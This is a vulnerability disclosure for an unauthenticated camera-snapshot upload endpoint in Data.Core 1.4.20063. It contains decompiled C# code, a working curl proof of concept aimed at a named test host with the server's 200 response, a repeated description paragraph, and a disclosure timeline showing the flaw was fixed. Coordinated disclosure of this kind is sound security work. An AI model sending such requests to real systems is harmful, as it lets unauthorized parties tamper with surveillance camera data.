Data.Core version 1.4.20063 does not authenticate the caller or check permissions in any way for the SaveCameraSnapshot functionality. This allows an unauthenticated attacker to upload camera previews for arbitrary device IDs.
Here is the code which lacks authentication when uploading camera previews. Note the lack of authentication checks. I've removed some unnecessary details for clarity:
// Assembly: Data.Core, Version=1.4.20063.0, Culture=neutral, PublicKeyToken=null
// MVID: 056C382B-886F-4DB7-8A66-306BAE1C5391
// Assembly location: C:\Users\admin\Documents\Immix\program\API\Data.Core.dll
[HttpPost("SaveCameraSnapshot")]
public async Task SaveCameraSnapshot([FromForm] SnapshotInfo info)
{
byte[] data = Convert.FromBase64String(info.Image);
using (IImmixDB db = this._provider.GetDB())
{
DeviceSetting deviceSetting = await Task.Run<DeviceSetting>((Func<DeviceSetting>) (<snip>));
int settingNumber = 1;
<snip>
DeviceSetting settingRecord = await Task.Run<DeviceSetting>((Func<DeviceSetting>) (<snip>));
<snip>
DeviceSetting setting = new DeviceSetting() {<snip>};
long num1 = await Task.Run<long>((Func<long>) (() => db.Insert<DeviceSetting>(setting)));
}
data = (byte[]) null;
}
curl -i 'https://mobiletest.sureviewsystems.com/api/Devices/SaveCameraSnapshot' --data-urlencode "DeviceID=6" --data-urlencode "Image=$(base64 cat.png)"
HTTP/1.1 100 Continue
HTTP/1.1 200 OK
Server: Kestrel
Date: Sat, 27 Mar 2021 16:52:18 GMT
Content-Length: 0
Vulnerability Description:
Data.Core version 1.4.20063 does not authenticate the caller or check permissions in any way for the SaveCameraSnapshot functionality. This allows an unauthenticated attacker to upload camera previews for arbitrary device IDs.
Here is the code which lacks authentication when uploading camera previews. Note the lack of authentication checks. I've removed some unnecessary details for clarity:
Exploit Proof-of-Concept:
Timeline
Disclosed: March 29, 2021
Acknowledged: March 29, 2021
Fixed: May 18, 2021